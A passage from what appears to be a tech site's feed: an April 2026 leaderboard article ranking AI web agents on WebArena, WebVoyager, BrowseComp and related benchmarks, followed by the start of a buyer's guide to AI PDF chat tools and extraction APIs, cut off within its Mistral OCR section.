<p>This leaderboard covers the major browser-specific benchmarks as of April 2026. Each suite tests something slightly different: task complexity, website diversity, the role of vision vs. text, and tolerance for ambiguity. No single number tells the full story. Read the methodology sections before drawing conclusions.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>On WebArena's multi-step task suite, Claude Mythos Preview leads tracked models at 68.7%, with specialized agentic frameworks (OpAgent, DeepSeek v3.2) pushing past 71-74% via online RL pipelines</li>
<li>WebVoyager scores near 97-98% for the top commercial agents in 2026, making that benchmark effectively saturated - look to WebChoreArena and BrowseComp for meaningful signal</li>
<li>BrowseComp is the hardest browsing eval in wide use: Deep Research scored 51.5% at launch, and the current top score is 86.9% for Claude Mythos Preview on the llm-stats.com tracker</li>
<li>Best budget pick for web tasks: open-source Browser Use framework running on GPT-4o hit 89.1% on WebVoyager, outperforming OpenAI's own Operator product (87%)</li>
</ul>
</div>
<h2 id="why-web-agent-benchmarks-differ-from-general-llm-evals">Why Web Agent Benchmarks Differ from General LLM Evals</h2>
<p>General benchmarks like MMLU or GPQA test whether a model knows things. Web agent benchmarks test whether a model can <em>do</em> things - navigate a real or simulated browser, interpret dynamic page content, chain actions across multiple steps, and recover from errors without human help.</p>
<p><img src="/images/leaderboards/web-agent-benchmarks-leaderboard-desk.jpg" alt="A laptop and monitor workstation setup representing the web browsing environment AI agents must navigate">
<em>AI agents operate on real or simulated browser environments, making web agent benchmarks a distinct category from static knowledge tests.</em>
<small>Source: unsplash.com</small></p>
<p>This distinction matters for benchmark selection. A model that tops GPQA may be terrible at clicking through a checkout flow. The correlation between raw LLM capability and web agent performance exists but isn't tight - scaffolding, observation format, and action space all contribute as much as the underlying model.</p>
<p>For context on how web agents relate to full desktop automation, see the <a href="/leaderboards/computer-use-leaderboard/">Computer Use Leaderboard: Desktop AI Agent Rankings</a>.</p>
<hr>
<h2 id="benchmark-overview">Benchmark Overview</h2>
<h3 id="webarena">WebArena</h3>
<p>The oldest major web agent eval. 812 tasks (241 templates, ~3.3 variations each) across four domains: e-commerce, social forums, code repositories, and content management. Tasks are long-horizon - &quot;Find when your last order shipped and post an update to the forum thread&quot; - with programmatic grading, no LLM judge involved. Scores are pass/fail success rate across all 812 tasks.</p>
<p>A verified, Docker-hosted version (webarena-verified) became available in February 2026, improving reproducibility. The original leaderboard at <a href="https://webarena.dev/">webarena.dev</a> lists community submissions.</p>
<h3 id="visualwebarena">VisualWebArena</h3>
<p>910 tasks built specifically for multimodal agents, where understanding what's on screen visually (images, product photos, UI layouts) is required to complete the task. Released by the same CMU group behind WebArena. At original publication in early 2024, the best VLM agent scored 16.4% against 88.7% human performance. Most current published results still cite the original paper rather than a live leaderboard.</p>
<h3 id="webvoyager">WebVoyager</h3>
<p>643 tasks across 15 popular websites - Google, Amazon, GitHub, Reddit, Wikipedia among them. Uses a dual evaluation approach: human annotation plus automated GPT-4V judgment. Published in 2024 with an original GPT-4V agent scoring 59.1%. The <a href="https://leaderboard.steel.dev/">Steel.dev leaderboard</a> now tracks live agent submissions against this benchmark.</p>
<h3 id="mind2web--mind2web-2">Mind2Web / Mind2Web 2</h3>
<p>The original Mind2Web (NeurIPS 2023) introduced 2,000+ open-ended tasks across 137 websites in 31 domains. Mind2Web 2, published at NeurIPS 2025, raised the bar far: 130 long-horizon tasks requiring real-time browsing and cross-site information synthesis, constructed with over 1,000 hours of human annotation. It uses an Agent-as-a-Judge framework with tree-structured rubrics. Best current system is OpenAI Deep Research at 50-70% of human performance.</p>
<p>Online-Mind2Web, a 2025 evaluation of 300 live tasks, showed that most commercially available agents underperform the academic SeeAct baseline from early 2024. The exceptions: Claude Computer Use 3.7 and OpenAI Operator at roughly 61% success.</p>
<h3 id="browsecomp">BrowseComp</h3>
<p>Released by OpenAI in April 2025. 1,266 hard information-retrieval problems designed to be nearly unsolvable by keyword search alone - tasks require multi-hop reasoning across multiple retrieved pages. At launch, GPT-4o with browsing scored 1.9%, o1 scored 9.9%, and Deep Research hit 51.5%. The <a href="https://cdn.openai.com/pdf/5e10f4ab-d6f7-442e-9508-59515c65e35d/browsecomp.pdf">full paper is available as a PDF</a>. Updated leaderboard data tracked by llm-stats.com puts scores far higher for 2026 frontier models.</p>
<h3 id="workarena--workarena">WorkArena / WorkArena++</h3>
<p>ServiceNow's enterprise-focused benchmark. WorkArena covers 33 atomic tasks in a ServiceNow instance. WorkArena++ scales this to 682 multi-step compositional tasks requiring planning, retrieval, arithmetic reasoning, and memory across browser sessions. Human performance is 93.9% on WorkArena++. GPT-4o managed only 2.1%, and no model hits meaningful performance on the L3 (ticket-like, context-rich) task tier.</p>
<h3 id="webchorearena">WebChoreArena</h3>
<p>A 2025 extension of WebArena with 532 tasks focused on tedious, labor-intensive work: massive memory retrieval, calculation across pages, and long-term cross-page reasoning. Gemini 2.5 Pro scores 54.8% on WebArena but drops to 37.8% on WebChoreArena. GPT-4o manages only 2.6% on WebChoreArena versus 44.9% for Gemini 2.5 Pro, exposing a much wider performance gap than the base benchmark.</p>
<hr>
<h2 id="rankings">Rankings</h2>
<h3 id="webarena---tracked-model-scores-april-2026">WebArena - Tracked Model Scores (April 2026)</h3>
<p>Scores from <a href="https://benchlm.ai/benchmarks/webArena">benchlm.ai</a>, which tracks 15 models against the standard 812-task suite.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>WebArena Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Mythos Preview</td>
          <td>Anthropic</td>
          <td>68.7%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GPT-5.4 Pro</td>
          <td>OpenAI</td>
          <td>65.8%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>64.5%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>62.3%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>59.2%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google</td>
          <td>58.4%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Qwen3.6 Plus</td>
          <td>Alibaba</td>
          <td>57.2%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3.5 397B</td>
          <td>Alibaba</td>
          <td>55.8%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Grok 4.1</td>
          <td>xAI</td>
          <td>53.7%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Gemini 3 Pro</td>
          <td>Google</td>
          <td>52.1%</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>51.3%</td>
      </tr>
      <tr>
          <td>12</td>
          <td>GLM-5 Reasoning</td>
          <td>Z.AI</td>
          <td>49.8%</td>
      </tr>
      <tr>
          <td>13</td>
          <td>DeepSeek V3.2 Thinking</td>
          <td>DeepSeek</td>
          <td>48.6%</td>
      </tr>
      <tr>
          <td>14</td>
          <td>Llama 4 Behemoth</td>
          <td>Meta</td>
          <td>46.2%</td>
      </tr>
      <tr>
          <td>15</td>
          <td>o4-mini (high)</td>
          <td>OpenAI</td>
          <td>44.5%</td>
      </tr>
  </tbody>
</table>
<p>Note: Specialized agentic frameworks that wrap models can score higher. OpAgent (CodeFuse AI) reached 71.6% on WebArena using a Planner-Grounder-Reflector-Summarizer multi-agent pipeline with online reinforcement learning, holding the #1 leaderboard position in January 2026. DeepSeek v3.2 as an agent backbone (not raw model) hit 74.3% in the Steel.dev results index, which tracks end-to-end agent systems rather than raw model calls.</p>
<h3 id="webvoyager---top-agent-systems-april-2026">WebVoyager - Top Agent Systems (April 2026)</h3>
<p>From the <a href="https://leaderboard.steel.dev/">Steel.dev Browser Agent Leaderboard</a>, tracking end-to-end agent submissions.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Agent</th>
          <th>Organization</th>
          <th>WebVoyager Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Alumnium</td>
          <td>Alumnium</td>
          <td>98.5%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Surfer 2</td>
          <td>H Company</td>
          <td>97.1%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Magnitude</td>
          <td>Magnitude</td>
          <td>93.9%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>AIME Browser-Use</td>
          <td>Aime</td>
          <td>92.3%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Surfer-H + Holo1</td>
          <td>H Company</td>
          <td>92.2%</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Browserable</td>
          <td>Browserable</td>
          <td>90.4%</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Browser Use</td>
          <td>Browser Use</td>
          <td>89.1%</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Operator</td>
          <td>OpenAI</td>
          <td>87.0%</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Skyvern 2.0</td>
          <td>Skyvern</td>
          <td>85.9%</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Project Mariner</td>
          <td>Google</td>
          <td>83.5%</td>
      </tr>
      <tr>
          <td>-</td>
          <td>WebVoyager (original)</td>
          <td>Academic</td>
          <td>59.1%</td>
      </tr>
  </tbody>
</table>
<p>WebVoyager scores are approaching saturation. Scores above 90% are common enough that the benchmark no longer differentiates the top tier well.</p>
<h3 id="browsecomp---model-scores-april-2026">BrowseComp - Model Scores (April 2026)</h3>
<p>From the llm-stats.com tracker, which covers 40 models. BrowseComp scores are reported as fractions (0.0-1.0).</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>BrowseComp Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Mythos Preview</td>
          <td>Anthropic</td>
          <td>0.869</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 3.1 Pro</td>
          <td>Google</td>
          <td>0.859</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>0.840</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>0.827</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GLM-5.1</td>
          <td>Zhipu AI</td>
          <td>0.793</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GPT-5.2 Pro</td>
          <td>OpenAI</td>
          <td>0.779</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Seed 2.0 Pro</td>
          <td>ByteDance</td>
          <td>0.773</td>
      </tr>
      <tr>
          <td>8</td>
          <td>MiniMax M2.5</td>
          <td>MiniMax</td>
          <td>0.763</td>
      </tr>
      <tr>
          <td>9</td>
          <td>GLM-5</td>
          <td>Zhipu AI</td>
          <td>0.759</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Kimi K2.5</td>
          <td>Moonshot AI</td>
          <td>0.749</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>0.747</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Qwen3.5-397B</td>
          <td>Alibaba</td>
          <td>0.690</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Deep Research (launch)</td>
          <td>OpenAI</td>
          <td>0.515</td>
      </tr>
      <tr>
          <td>-</td>
          <td>o3</td>
          <td>OpenAI</td>
          <td>0.497</td>
      </tr>
      <tr>
          <td>-</td>
          <td>GPT-4o with browsing</td>
          <td>OpenAI</td>
          <td>0.019</td>
      </tr>
  </tbody>
</table>
<p>The jump from 0.515 (Deep Research at launch) to 0.869 in under a year is steep. BrowseComp remains the hardest widely-used browsing eval and hasn't saturated yet.</p>
<p><img src="/images/leaderboards/web-agent-benchmarks-leaderboard-dashboard.jpg" alt="A web performance analytics dashboard showing real-time data - similar to what web agents must interpret and reason about during task completion">
<em>Web agents must interpret and act on complex data-rich interfaces like dashboards. Benchmarks like WorkArena++ specifically test this kind of enterprise SaaS interaction.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="anthropic-and-openai-trade-leads-depending-on-the-benchmark">Anthropic and OpenAI Trade Leads Depending on the Benchmark</h3>
<p>Anthropic's models dominate WebArena and BrowseComp. OpenAI's ecosystem leads on WebVoyager through commercial products like Operator. Google's Gemini 3.1 Pro scores second on BrowseComp at 0.859 and shows competitive WebArena numbers. The gap between providers has closed significantly since late 2024.</p>
<h3 id="agentic-frameworks-beat-raw-model-calls-by-a-wide-margin">Agentic Frameworks Beat Raw Model Calls by a Wide Margin</h3>
<p>The 74.3% DeepSeek v3.2 agent score on WebArena versus the same model's 48.6% raw-model score shows what a well-designed scaffolding layer contributes. OpAgent's online RL pipeline - where the agent learns from task failures on the fly - represents the current state of the art for WebArena. Raw model API calls are not the right comparison point for production web agent deployments.</p>
<h3 id="webvoyager-has-saturated">WebVoyager Has Saturated</h3>
<p>Near-perfect WebVoyager scores no longer distinguish good systems from excellent ones. Scores in the 90-98% range are clustered, and the benchmark uses GPT-4V as a judge - which may not reliably distinguish between a 92% and a 97% agent. Researchers and practitioners should weight WebChoreArena (the harder variant) and BrowseComp more heavily.</p>
<h3 id="enterprise-web-tasks-remain-very-hard">Enterprise Web Tasks Remain Very Hard</h3>
<p>WorkArena++ at 2.1% for GPT-4o makes the frontier model gap with humans (93.9%) vivid. The benchmark's L3 tasks - which mirror real ServiceNow workflows with complex context requirements - have effectively zero LLM success now. Any vendor claiming &quot;autonomous enterprise agent&quot; capabilities should be pressed on WorkArena++ L3 numbers.</p>
<h3 id="open-source-agents-are-competitive">Open-Source Agents Are Competitive</h3>
<p>Browser Use (open-source) beat OpenAI's commercial Operator on WebVoyager, 89.1% vs 87%. The performance gap between open and closed systems that defined 2024 has mostly closed at the framework level. The underlying models still favor closed-source providers, but the agent scaffolding is no longer a meaningful differentiator.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<h3 id="for-general-web-task-automation">For general web task automation</h3>
<p>If you're building browser agents on top of frontier model APIs, Claude Opus 4.6 or GPT-5.4 as the backbone gives you the strongest raw capability. Pair either with the Browser Use open-source framework (see our <a href="/tools/best-ai-browser-automation-tools-2026/">Best AI Browser Automation Tools</a> roundup) rather than building scaffolding from scratch. The open-source frameworks now match or exceed proprietary agent products on standard benchmarks.</p>
<h3 id="for-research-on-web-agents">For research on web agents</h3>
<p>BrowseComp and WebChoreArena are the benchmarks worth tracking in 2026. WebVoyager provides a useful regression check but shouldn't be the primary eval. For enterprise-specific scenarios, WorkArena++ L2 is realistic; L3 results tell you how far you still have to go. Mind2Web 2 is the right choice for agentic search and long-horizon information tasks.</p>
<h3 id="for-commercial-web-agent-products">For commercial web agent products</h3>
<p>If you're evaluating products like OpenAI Operator, Google Project Mariner, or Skyvern, ask for BrowseComp scores rather than WebVoyager scores. BrowseComp's hard information-retrieval problems separate agents that actually reason from agents that pattern-match. Our <a href="/tools/best-ai-browser-agents-2026/">Best AI Browser Agents</a> guide covers the commercial product landscape.</p>
<h3 id="for-open-source-work">For open-source work</h3>
<p>The Browser Use framework running on GPT-4o is the strongest open-source baseline. MolMo-Web (AI2) is a <a href="/news/molmoweb-ai2-open-source-web-agent/">notable recent open-source web agent</a> worth watching if you need a permissively licensed option. The BrowserGym ecosystem from ServiceNow provides a unified test harness across WebArena, WorkArena, VisualWebArena, and others - useful if you want reproducible comparisons across benchmarks.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-web-agent-benchmark-should-i-use-for-evaluating-my-system">Which web agent benchmark should I use for evaluating my system?</h3>
<p>Use BrowseComp for hard information-retrieval tasks, WebChoreArena for tedious multi-step tasks, and WorkArena++ for enterprise SaaS workflows. WebVoyager is near-saturated for top systems; use it as a baseline check only.</p>
<h3 id="whats-the-difference-between-webarena-and-webvoyager">What's the difference between WebArena and WebVoyager?</h3>
<p>WebArena uses four simulated websites with programmatic grading and 812 multi-step tasks. WebVoyager uses 15 live real-world websites with 643 tasks and GPT-4V automated judging. WebArena is more reproducible; WebVoyager tests live-web generalization.</p>
<h3 id="can-open-source-agents-match-commercial-products-on-web-tasks">Can open-source agents match commercial products on web tasks?</h3>
<p>Yes, at the framework level. Browser Use (open-source) scored 89.1% on WebVoyager vs 87% for OpenAI Operator. The underlying model still matters, but the scaffolding gap has closed significantly.</p>
<h3 id="how-do-workarena-scores-compare-to-real-enterprise-automation">How do WorkArena++ scores compare to real enterprise automation?</h3>
<p>WorkArena++ L3 tasks have near-zero LLM success rates vs 93.9% for humans. No current LLM-based agent should be trusted for unsupervised enterprise workflow automation without significant human oversight.</p>
<h3 id="how-often-do-these-rankings-change">How often do these rankings change?</h3>
<p>WebVoyager and BrowseComp update frequently as new agent submissions arrive. WebArena updates more slowly. WorkArena++ results have been stable since mid-2025. Check Steel.dev and benchlm.ai for current snapshots.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://webarena.dev/">WebArena: A Realistic Web Environment for Building Autonomous Agents</a></li>
<li><a href="https://github.com/web-arena-x/webarena">WebArena GitHub Repository</a></li>
<li><a href="https://github.com/web-arena-x/visualwebarena">VisualWebArena GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2401.13919">WebVoyager: Building an End-to-End Web Agent with Large Multimodal Models</a></li>
<li><a href="https://github.com/MinorJerry/WebVoyager">WebVoyager GitHub Repository</a></li>
<li><a href="https://osu-nlp-group.github.io/Mind2Web-2/">Mind2Web 2 Benchmark Page</a></li>
<li><a href="https://cdn.openai.com/pdf/5e10f4ab-d6f7-442e-9508-59515c65e35d/browsecomp.pdf">BrowseComp Technical Paper (PDF)</a></li>
<li><a href="https://servicenow.github.io/WorkArena/">WorkArena: How Capable Are Web Agents at Solving Common Knowledge Work Tasks?</a></li>
<li><a href="https://github.com/ServiceNow/WorkArena">WorkArena GitHub Repository</a></li>
<li><a href="https://arxiv.org/abs/2403.07718">WorkArena++ NeurIPS 2024 Paper</a></li>
<li><a href="https://webchorearena.github.io/">WebChoreArena Project Page</a></li>
<li><a href="https://arxiv.org/abs/2407.15711">AssistantBench: Can Web Agents Solve Realistic and Time-Consuming Tasks?</a></li>
<li><a href="https://browser-use.com/posts/sota-technical-report">Browser Use State-of-the-Art Technical Report</a></li>
<li><a href="https://leaderboard.steel.dev/">Steel.dev AI Browser Agent Leaderboard</a></li>
<li><a href="https://github.com/codefuse-ai/OpAgent">OpAgent: Operator Agent for Web Navigation</a></li>
<li><a href="https://benchlm.ai/benchmarks/webArena">BenchLM.ai WebArena Leaderboard</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/web-agent-benchmarks-leaderboard_hu_6b9065d7101686e6.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/web-agent-benchmarks-leaderboard_hu_6b9065d7101686e6.jpg" width="1200" height="675"/></item><item><title>Best AI PDF Tools 2026: Consumer Chat vs Dev APIs</title><link>https://awesomeagents.ai/tools/best-ai-pdf-tools-2026/</link><pubDate>Fri, 17 Apr 2026 20:11:49 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-pdf-tools-2026/</guid><description>&lt;p>There are two very different problems in the AI PDF space, and vendors tend to blur them together. One is the consumer use case: upload a contract, textbook, or research paper and ask questions about it. The other is production document extraction: pull structured tables, form fields, and equations from millions of pages to feed downstream systems. The tools that solve one of these well often fail at the other. This guide separates the two categories and ranks each on data that you can verify.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>There are two very different problems in the AI PDF space, and vendors tend to blur them together. One is the consumer use case: upload a contract, textbook, or research paper and ask questions about it. The other is production document extraction: pull structured tables, form fields, and equations from millions of pages to feed downstream systems. The tools that solve one of these well often fail at the other. This guide separates the two categories and ranks each on data that you can verify.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Best consumer PDF chat overall: <strong>ChatDOC</strong> - accurate citations, GPT-4o access, 200-page free tier</li>
<li>Best developer extraction API: <strong>Mistral OCR</strong> - 96.1% table accuracy, $1 per 1,000 pages with batch pricing</li>
<li>For zero-cost self-hosting: <strong>Docling</strong> (IBM open-source) and <strong>Marker</strong> are both strong, with Docling scoring 0.882 on OmniDocBench text fidelity vs Marker's 0.861</li>
<li>Azure and AWS are reliable for forms at scale but cost 6-40x more than Mistral OCR per page</li>
<li>LlamaParse is the default for RAG pipelines already using LlamaIndex, but gets expensive fast on complex layouts</li>
</ul>
</div>
<h2 id="what-this-guide-covers">What This Guide Covers</h2>
<p>The consumer/SaaS tools reviewed here - ChatPDF, Adobe Acrobat AI Assistant, HumataAI, AskYourPDF, ChatDOC, PDF.ai, LightPDF AI, and Smallpdf AI - are aimed at professionals, students, and researchers who need to interact with documents through a chat interface.</p>
<p>The developer/API tools - Mistral OCR, LlamaParse, Reducto, Unstructured.io, Azure AI Document Intelligence, AWS Textract, Google Document AI, Marker, and Docling - are aimed at engineering teams building pipelines. They're evaluated differently: output format fidelity, table/equation accuracy, throughput, and cost per page matter more than chat quality.</p>
<p>If you're building a RAG pipeline and want to understand how these extraction tools fit into a retrieval architecture, see the <a href="/tools/best-ai-rag-tools-2026/">best AI RAG tools guide</a>. If structured data extraction from spreadsheets is your goal, the <a href="/tools/best-ai-data-analysis-tools-2026/">best AI data analysis tools guide</a> covers that separately.</p>
<hr>
<h2 id="consumer-pdf-chat-tools">Consumer PDF Chat Tools</h2>
<h3 id="comparison-table">Comparison Table</h3>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Free Tier</th>
          <th>Paid Plan</th>
          <th>Context / Page Limit</th>
          <th>Highlights</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>ChatDOC</td>
          <td>5 uploads/day, 300 questions</td>
          <td>$8.99/month</td>
          <td>200 pages/file (free)</td>
          <td>GPT-4o, citation tracing, OCR</td>
      </tr>
      <tr>
          <td>ChatPDF</td>
          <td>2 PDFs/day</td>
          <td>Plus (unlimited)</td>
          <td>120 pages/file (free)</td>
          <td>GPT-4o/4o-mini routing, no login needed</td>
      </tr>
      <tr>
          <td>HumataAI</td>
          <td>10 answers/month, 60 pages</td>
          <td>$9.99/month (Expert)</td>
          <td>500 pages (Expert)</td>
          <td>Best for academic docs</td>
      </tr>
      <tr>
          <td>AskYourPDF</td>
          <td>50 questions/day</td>
          <td>$11.99/month</td>
          <td>2,500 pages (paid)</td>
          <td>Plugin ecosystem, 50 docs/day paid</td>
      </tr>
      <tr>
          <td>Adobe Acrobat AI</td>
          <td>No free AI tier</td>
          <td>$4.99/month add-on</td>
          <td>Up to 10 files, 600 pages each</td>
          <td>Native PDF editing + AI chat</td>
      </tr>
      <tr>
          <td>LightPDF AI</td>
          <td>8 questions/day</td>
          <td>$19.99/month</td>
          <td>100 MB file limit</td>
          <td>25+ PDF tools bundled</td>
      </tr>
      <tr>
          <td>PDF.ai</td>
          <td>Limited daily use</td>
          <td>$15/month</td>
          <td>Unlimited docs (Pro)</td>
          <td>Clean UI, unlimited chat</td>
      </tr>
      <tr>
          <td>Smallpdf AI</td>
          <td>Unlimited basic Q&amp;A</td>
          <td>$12/month (Pro)</td>
          <td>No registration needed</td>
          <td>Fast summaries, EU-hosted</td>
      </tr>
  </tbody>
</table>
<h3 id="chatdoc">ChatDOC</h3>
<p>ChatDOC is the strongest consumer option right now. The free tier allows five document uploads per day at 200 pages each, with 300 questions daily - generous enough for real use. The Pro plan at $8.99/month adds GPT-4o access, formula recognition, and OCR for scanned documents. ChatDOC's citation feature traces answers to the specific page and passage, which matters when you need to verify an AI claim against a contract or technical spec.</p>
<p>For users who need to stay on budget, the add-on packages are a useful safety valve: extra files cost $0.29 each and extra pages cost $0.06 each, both valid for 90 days.</p>
<h3 id="chatpdf">ChatPDF</h3>
<p>ChatPDF is the entry point for many users and gets the basics right. Free usage requires no account: upload a PDF, start chatting. The 2-document daily limit on the free tier is workable for occasional use, and the smart routing between GPT-4o and GPT-4o-mini keeps response quality reasonable without inflating costs. The 120-page cap per file is a real constraint for long reports.</p>
<p>ChatPDF's strength is simplicity. There's nothing to configure, and sharing a secure link to a PDF-chat session takes seconds. It's not the best at long documents or multi-file analysis, but it remains the fastest way to extract a quick answer from a short PDF.</p>
<h3 id="humataai">HumataAI</h3>
<p>HumataAI is the option for students. The $1.99/month Student plan (with verified.edu email) covers 200 pages per month - enough for coursework and paper review. The Expert plan at $9.99/month is competitive for individual researchers. HumataAI's search and comparison features across multiple documents are stronger than ChatPDF's, but the free tier at 10 answers per month and 60 pages is too restrictive for real evaluation.</p>
<h3 id="adobe-acrobat-ai-assistant">Adobe Acrobat AI Assistant</h3>
<p>Adobe bundles the AI assistant as a $4.99/month add-on to any Acrobat subscription. This is the right pick if you're already paying for Acrobat Pro ($19.99/month) and do substantial PDF editing. The AI chat supports up to 10 files simultaneously at 600 pages each - the largest multi-file context window in this category.</p>
<p>The 2026 Acrobat Studio plan ($24.99/month) bundles AI features, PDF editing, and creative tools. Whether it's worth the premium depends completely on how much you use Acrobat for non-AI tasks. As a standalone PDF chat tool, you can find better value at lower price points.</p>
<h3 id="askyourpdf-pdfai-lightpdf-ai-smallpdf-ai">AskYourPDF, PDF.ai, LightPDF AI, Smallpdf AI</h3>
<p>AskYourPDF's paid plan at $11.99/month is solid value: 1,200 questions per day, 50 documents per day, up to 2,500 pages per document. The plugin ecosystem is an edge over competitors. PDF.ai at $15/month is clean and straightforward but doesn't offer anything that distinguishes it from ChatDOC or AskYourPDF at a lower cost.</p>
<p>LightPDF AI bundles 25+ PDF tools (convert, compress, edit) with AI chat. The $19.99/month price is harder to justify unless you need those utility tools with the chat capabilities. Smallpdf AI offers free unlimited basic Q&amp;A without registration, which is useful for one-off summaries. Its EU hosting is a genuine differentiator for users with data residency requirements. The $12/month Pro plan unlocks advanced features.</p>
<hr>
<h2 id="developer-and-api-extraction-tools">Developer and API Extraction Tools</h2>
<p>This is where accuracy benchmarks and per-page costs matter. The two main public benchmarks for this category are <a href="https://arxiv.org/abs/2412.07626">OmniDocBench</a> (a CVPR 2025 benchmark covering text, tables, formulas, and reading order across nine document types) and Reducto's RD-TableBench (1,000 hand-labeled table images from varied public documents, scoring table similarity with a Needleman-Wunsch alignment algorithm).</p>
<h3 id="comparison-table-1">Comparison Table</h3>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Table Accuracy</th>
          <th>Price per 1K pages</th>
          <th>Free Tier</th>
          <th>Output Formats</th>
          <th>Self-host</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Mistral OCR</td>
          <td>96.1% (internal)</td>
          <td>$1 (batch) / $1 (standard, was $2)</td>
          <td>No</td>
          <td>Markdown, JSON</td>
          <td>Selective</td>
      </tr>
      <tr>
          <td>LlamaParse</td>
          <td>Varies by mode</td>
          <td>$0.00125 (simple) / $0.11+ (agent)</td>
          <td>10K credits</td>
          <td>Markdown, JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Reducto</td>
          <td>90.2% (RD-TableBench)</td>
          <td>Custom (15K credits free)</td>
          <td>15K credits</td>
          <td>JSON, Markdown</td>
          <td>VPC (Enterprise)</td>
      </tr>
      <tr>
          <td>Unstructured.io</td>
          <td>Varies by strategy</td>
          <td>$30/1K pages (pay-as-you-go)</td>
          <td>15K pages</td>
          <td>JSON, HTML, Markdown</td>
          <td>Yes (open-source)</td>
      </tr>
      <tr>
          <td>Azure Doc Intelligence</td>
          <td>~$10/1K pages</td>
          <td>$10 (prebuilt), $30 (custom)</td>
          <td>500 pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>AWS Textract</td>
          <td>Tables: $15-65/1K pages</td>
          <td>$1.50 (basic OCR)</td>
          <td>1K pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Google Document AI</td>
          <td>$1.50/1K pages (OCR)</td>
          <td>$1.50 (OCR), $30 (custom extractor)</td>
          <td>300 pages/month</td>
          <td>JSON</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Marker</td>
          <td>OmniDocBench: 0.861</td>
          <td>Free</td>
          <td>Unlimited (self-host)</td>
          <td>Markdown, JSON</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Docling</td>
          <td>OmniDocBench: 0.882</td>
          <td>Free</td>
          <td>Unlimited (self-host)</td>
          <td>DoclingDocument, Markdown, JSON</td>
          <td>Yes</td>
      </tr>
  </tbody>
</table>
<h3 id="mistral-ocr-mistral-ocr-2503--mistral-ocr-latest">Mistral OCR (mistral-ocr-2503 / mistral-ocr-latest)</h3>
<p>Mistral OCR is the best API pick for most document extraction workloads. In Mistral's internal benchmarks, the model scores 96.12% on table parsing, 94.29% on math, and 98.96% on scanned documents. On multilingual content, it hits 97.55% for Hindi and 97.11% for Chinese. The newer Mistral OCR 3 (released January 2026) improved accuracy on handwriting and forms, with a 74% win rate over OCR 2 in internal evaluations.</p>
<p><img src="/images/tools/best-ai-pdf-tools-2026-mistral-table.jpg" alt="Mistral OCR parsing a complex table with figures - rendered output showing clean HTML table structure">
<em>Mistral OCR rendering a complex multi-column table with figures. Output uses Markdown text with HTML table tags for structured cells.</em>
<small>Source: mistral.ai</small></p>
